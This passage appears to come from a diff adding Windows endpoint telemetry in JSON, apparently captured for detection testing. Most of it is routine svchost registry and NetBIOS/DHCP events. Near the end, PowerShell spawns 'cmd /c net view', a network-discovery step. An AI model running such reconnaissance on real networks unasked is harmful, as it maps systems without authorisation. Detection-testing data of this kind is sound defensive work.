"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpIPAddress", + "registry_value": "DhcpIPAddress", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpSubnetMask", + "registry_value": "DhcpSubnetMask", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpServer", + "registry_value": "DhcpServer", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\Lease", + "registry_value": "Lease", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\LeaseObtainedTime", + "registry_value": "LeaseObtainedTime", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\T1", + "registry_value": "T1", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\T2", + "registry_value": "T2", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\LeaseTerminatesTime", + "registry_value": "LeaseTerminatesTime", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\AddressType", + "registry_value": "AddressType", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\IsServerNapAware", + "registry_value": "IsServerNapAware", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpConnForceBroadcastFlag", + "registry_value": "DhcpConnForceBroadcastFlag", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\NetBT", + "registry_value": "NetBT", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\NetBT", + "registry_value": "NetBT", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" + }, + { + "event_type": "registry", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" + }, + { + "event_type": "registry", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" + }, + { + "event_type": "registry", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884330000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884330000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884330000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884330000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "destination_address": "192.168.162.129", + "destination_port": "139", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "tcp", + "source_address": "192.168.162.134", + "source_port": "50503", + "subtype": "outgoing", + "timestamp": 131883571877130000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.255", + "destination_port": "138", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "138", + "subtype": "outgoing", + "timestamp": 131883571877190000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.134", + "destination_port": "138", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.255", + "source_port": "138", + "subtype": "incoming", + "timestamp": 131883571877190000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.254", + "destination_port": "67", + "event_type": "network", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "68", + "subtype": "outgoing", + "timestamp": 131883571884160000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}", + "user": "NT AUTHORITY\\LOCAL SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "destination_address": "192.168.162.254", + "destination_port": "137", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "137", + "subtype": "outgoing", + "timestamp": 131883571887450016, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.129", + "destination_port": "137", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.255", + "source_port": "137", + "subtype": "incoming", + "timestamp": 131883571922940000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.129", + "destination_port": "138", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "138", + "subtype": "incoming", + "timestamp": 131883571922940000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "process", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "terminate", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "process", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"net view\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 8124, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571956180000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "command_line": "net view", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1744, + "ppid": 8124, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "create", + "timestamp": 131883571956270016, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}", + "unique_ppid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "net.exe", + "image_path": "C:\\Windows\\System32\\net.exe", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { 